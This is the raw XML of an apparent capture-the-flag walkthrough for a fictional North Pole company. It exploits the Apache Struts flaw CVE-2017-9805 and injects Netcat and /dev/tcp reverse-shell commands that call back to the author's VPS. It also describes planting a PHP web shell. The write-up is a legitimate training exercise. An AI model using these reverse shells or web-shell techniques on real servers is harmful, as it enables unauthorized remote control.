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46581" w14:textId="0F13B0C3" w:rsidR="0062254B" w:rsidRDefault="0062254B" w:rsidP="0062254B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Letters to Santa--a real world attack</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Part 6, Grab the Great Book Page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209DAF4C" w14:textId="37B63BEA" w:rsidR="00D572E8" w:rsidRDefault="00010C49" w:rsidP="0062254B">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Here are the methods you</w:t>
      </w:r>
      <w:r w:rsidR="00D572E8">
        <w:t xml:space="preserve"> may have</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> used in Part 5 to obtain a reverse shell on the dev server.</w:t>
      </w:r>
      <w:r w:rsidR="00D572E8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">  First, make sure there is an open port on your VPS for your Netcat listener.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0170DAF9" w14:textId="124949B7" w:rsidR="0062254B" w:rsidRDefault="00D572E8" w:rsidP="0062254B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="740E9D74" wp14:editId="56E109FE">
            <wp:extent cx="5943600" cy="62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1030"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="558E7232" w14:textId="4B2C9573" w:rsidR="00010C49" w:rsidRDefault="00010C49" w:rsidP="00010C49">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Netcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1516192B" w14:textId="1BFECC6C" w:rsidR="00010C49" w:rsidRDefault="00D572E8" w:rsidP="0062254B">
      <w:r>
        <w:t xml:space="preserve">The first task is to start the Netcat listener on your VPS.  As you can see below, the version of Netcat installed by yum does not like the -p option.  It runs fine as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D572E8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D572E8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D572E8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>nvl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D572E8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4214</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> though.  The port number must match the port we’ve opened to the outside on our VPS.  The -n switch tells Netcat not to convert IP addresses to domain names.  The -v option means “verbose” and the -l option tells Netcat to listen.</w:t>
      </w:r>
      <w:r w:rsidR="0080780B">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="000E177D">
        <w:t>After getting the error from the revisionist version of Netcat from yum, we</w:t>
      </w:r>
      <w:r w:rsidR="0080780B">
        <w:t xml:space="preserve"> re-ran the command without -p, which succeeded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EAC9202" w14:textId="22095884" w:rsidR="00010C49" w:rsidRDefault="00010C49" w:rsidP="0062254B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1606E7B3" wp14:editId="723C57C5">
            <wp:extent cx="58197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993"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5819775" cy="2409825"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B958F27" w14:textId="540B24F4" w:rsidR="00D572E8" w:rsidRDefault="00D572E8" w:rsidP="0062254B">
      <w:r>
        <w:t xml:space="preserve">The next step is to execute the exploit command.  As before, I’m running this from a CentOS VM.  The command is </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00D572E8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>./cve-2017-9805.py -u https://dev.northpolechristmastown.com/orders.xhtml -c "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D572E8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D572E8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> -e /bin/bash ec2-35-171-88-102.compute-1.amazonaws.com 4214"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7877AB" w14:textId="3AD86EA5" w:rsidR="00010C49" w:rsidRDefault="00D572E8" w:rsidP="0062254B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">As before, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D572E8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">-u </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00D572E8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          </w:rPr>
          <w:t>https://dev.northpolechristmastown.com/orders.xhtml</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> tells the exploit to run against the dev server.</w:t>
      </w:r>
      <w:r w:rsidR="00A832CB">
        <w:t xml:space="preserve">  The command to execute is </w:t>
      </w:r>
      <w:r w:rsidR="00A832CB">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00A832CB" w:rsidRPr="00D572E8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>-c "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A832CB" w:rsidRPr="00D572E8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A832CB" w:rsidRPr="00D572E8">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> -e /bin/bash ec2-35-171-88-102.compute-1.amazonaws.com 4214"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C198344" w14:textId="56FDB9F0" w:rsidR="00A832CB" w:rsidRPr="0062254B" w:rsidRDefault="00A832CB" w:rsidP="0062254B">
      <w:r>
        <w:t>The -e option tells Netcat to execute a command, /bin/bash.  This sends a bash shell to the Netcat listener on the VPS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FE5A6F" w14:textId="2CBC5D91" w:rsidR="004A3478" w:rsidRDefault="00010C49">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C098039" wp14:editId="0926B362">
            <wp:extent cx="5943600" cy="1510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0665"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="515E4889" w14:textId="573A1713" w:rsidR="00010C49" w:rsidRDefault="00A832CB">
      <w:r>
        <w:t>We do not receive feedback from the exploit command, but the Netcat listener soon reports that it has accepted a connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206E9C22" w14:textId="5F8F326A" w:rsidR="00010C49" w:rsidRDefault="00010C49">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56EE5C7C" wp14:editId="3E0BA8C4">
            <wp:extent cx="5943600"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6855"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="138DE680" w14:textId="4EC443EC" w:rsidR="00E45897" w:rsidRDefault="008A7377">
      <w:r>
        <w:t xml:space="preserve">Note that we have received a shell, not a terminal.  The Linux prompt is missing, </w:t>
      </w:r>
      <w:r w:rsidR="00114C1A">
        <w:t xml:space="preserve">and commands like less and more may not work.  A bit of preliminary reconnaissance shows us that the exploit drops us in the </w:t>
      </w:r>
      <w:r w:rsidR="002F6A3F">
        <w:t xml:space="preserve">file system root </w:t>
      </w:r>
      <w:r w:rsidR="00114C1A">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00114C1A">
        <w:t>pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00114C1A">
        <w:t xml:space="preserve"> shows /), we are running as the user </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00114C1A">
        <w:t>alabaster_snowball</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00114C1A">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00114C1A">
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00114C1A">
        <w:t>) and the server is Debian Linux (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00114C1A">
        <w:t>uname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00114C1A">
        <w:t xml:space="preserve"> -a).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6941F188" w14:textId="2AE0A543" w:rsidR="00E45897" w:rsidRDefault="00114C1A" w:rsidP="00114C1A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0730CD77" w14:textId="45C34CF7" w:rsidR="00114C1A" w:rsidRDefault="00114C1A">
      <w:r>
        <w:t>Another way to get shell is to use redirection and the /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> connection.</w:t>
      </w:r>
      <w:r w:rsidR="004D2150">
        <w:t xml:space="preserve">  Again, the first step is to start a Netcat listener on your VPS with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004D2150" w:rsidRPr="004D2150">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004D2150" w:rsidRPr="004D2150">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004D2150" w:rsidRPr="004D2150">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>nvl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004D2150" w:rsidRPr="004D2150">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;port&gt;</w:t>
      </w:r>
      <w:r w:rsidR="004D2150">
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004D2150" w:rsidRPr="004D2150">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004D2150" w:rsidRPr="004D2150">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004D2150" w:rsidRPr="004D2150">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>nlvp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004D2150" w:rsidRPr="004D2150">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;port&gt;</w:t>
      </w:r>
      <w:r w:rsidR="004D2150">
        <w:t xml:space="preserve"> depending on the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004D2150">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004D2150">
        <w:t xml:space="preserve"> version.  I’ve omitted a screenshot of that since it is the same as above.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706C87A7" w14:textId="778630A4" w:rsidR="004D2150" w:rsidRDefault="004D2150">
      <w:r>
        <w:t xml:space="preserve">Then, run the exploit as before but with a different command.  In this case, the command is </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="004D2150">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>-c "bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D2150">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D2150">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt;&amp; /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004D2150">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004D2150">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>/ec2-35-171-88-102.compute-1.amazonaws.com/4214 0&gt;&amp;1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C81208" w14:textId="707D6616" w:rsidR="00D572E8" w:rsidRDefault="004D2150">
      <w:r>
        <w:t xml:space="preserve">The reason for the different redirects in the command above is </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="004D2150">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>explained here</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>, so I won’t repeat it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F53AD0" w14:textId="15C23ABA" w:rsidR="00D572E8" w:rsidRDefault="00D572E8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="168BC716" wp14:editId="5D393409">
            <wp:extent cx="5943600" cy="1496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6060"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C88B72" w14:textId="56EABF28" w:rsidR="00D572E8" w:rsidRDefault="00953A15">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The exploit works, and the VPS Netcat listener receives a connection.</w:t>
      </w:r>
      <w:r w:rsidR="00D572E8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42D2EFA2" wp14:editId="313FE4C8">
            <wp:extent cx="59245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1847850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B44C15" w14:textId="5430A07E" w:rsidR="00953A15" w:rsidRDefault="00953A15">
      <w:r>
        <w:t xml:space="preserve">This time, the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> command shows us we are in the directory /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>asnow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>random stuff],</w:t>
      </w:r>
      <w:r w:rsidR="00E04EB3">
        <w:t xml:space="preserve"> ls shows us that directory is empty,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> command does not work.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC0221A" w14:textId="77777777" w:rsidR="00FB16B6" w:rsidRDefault="00FB16B6" w:rsidP="00FB16B6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>The Mysterious Web Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE932FD" w14:textId="267E3BAF" w:rsidR="00FB16B6" w:rsidRDefault="00FB16B6" w:rsidP="00FB16B6">
      <w:r>
        <w:t xml:space="preserve">The web shell was mysterious for me, at least.  The l2s and dev web servers appear to be the same machine, but I missed that simple fact.  (The fact that they have the same IP address may have clued me in earlier.)  The link l2s.northpolechristmastown.com takes us to an Nginx server that serves the production page, with a standard web root of </w:t>
      </w:r>
      <w:r w:rsidRPr="00B11CB6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>/var/www/html</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and configuration files in </w:t>
      </w:r>
      <w:r w:rsidRPr="00B11CB6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B11CB6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B11CB6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B11CB6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>nginx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">.  The link dev.northpolechristmastown.com takes us to an Apache Tomcat/Struts server with its content in </w:t>
      </w:r>
      <w:r w:rsidRPr="00B11CB6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>/opt/apache-tomcat/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B11CB6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>webapps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B11CB6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>/ROOT/WEB-INF/content</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C55CAD6" w14:textId="77777777" w:rsidR="00FB16B6" w:rsidRDefault="00FB16B6" w:rsidP="00FB16B6">
      <w:r>
        <w:t xml:space="preserve">When we attack the dev server using the Apache Struts vulnerability, we can install a PHP web shell (see Sparkle’s Hints 4 and 5) into </w:t>
      </w:r>
      <w:r w:rsidRPr="00B11CB6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>/var/www/html</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.  However, we access the web shell by browsing the </w:t>
      </w:r>
      <w:r w:rsidRPr="0011574D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>l2s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> web server because </w:t>
      </w:r>
      <w:r w:rsidRPr="00B11CB6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>/var/www/html</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is the web root of l2s, not dev.  If we wanted to install a shell on dev, we would need to find a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jsp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> shell (</w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidRPr="00A30E0E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>here</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="00A30E0E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>here</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">) and install it in </w:t>
      </w:r>
      <w:r w:rsidRPr="00B11CB6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>/opt/apache-tomcat/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B11CB6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>webapps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B11CB6">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>/ROOT/WEB-INF/content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52532CB0" w14:textId="77777777" w:rsidR="00FB16B6" w:rsidRDefault="00FB16B6" w:rsidP="00FB16B6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="09BBB6AA" wp14:editId="015B56ED">
            <wp:extent cx="2971800" cy="147740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110" cy="1487506"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00A862FB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28227A4C" wp14:editId="4DBA71ED">
            <wp:extent cx="2847813"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668" cy="968732"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE63793" w14:textId="1CF74475" w:rsidR="00FB16B6" w:rsidRDefault="00FB16B6" w:rsidP="00FB16B6">
      <w:r>
        <w:t xml:space="preserve">The content from Sparkle’s Hint 4 needs to go into a PHP file, and the content has both single and double quotes.  Those quotes may cause a problem.  If we create the file using </w:t>
      </w:r>
      <w:r w:rsidRPr="00A30E0E">
        <w:t>cve-2017-9805.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> we’ll need to enclose the entire command in quotes.  Additionally, if we use the traditional </w:t>
      </w:r>
      <w:r w:rsidRPr="00A30E0E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>echo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and redirection method to copy the content into </w:t>
      </w:r>
      <w:r w:rsidR="00B3097B">
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> file, we’ll need to enclose that in quotes as well.  All these nested quotes cause errors.  It may be possible to use escape characters to keep the quotes from interfering with each other, but I’ve never had much luck with that.  Here is a sample error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EEE1DD" w14:textId="77777777" w:rsidR="00FB16B6" w:rsidRDefault="00FB16B6" w:rsidP="00FB16B6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04B17EE9" wp14:editId="285E585C">
            <wp:extent cx="5943600" cy="1059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9180"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A39DB70" w14:textId="020314DA" w:rsidR="00FB16B6" w:rsidRDefault="00FB16B6" w:rsidP="00FB16B6">
      <w:r>
        <w:t>(Note: you could bypass the echo method I’m using here by making the exploit execute wget or curl on the server to download the PHP file from another server, assuming the server lets you run wget.)</w:t>
      </w:r>
    </w:p>
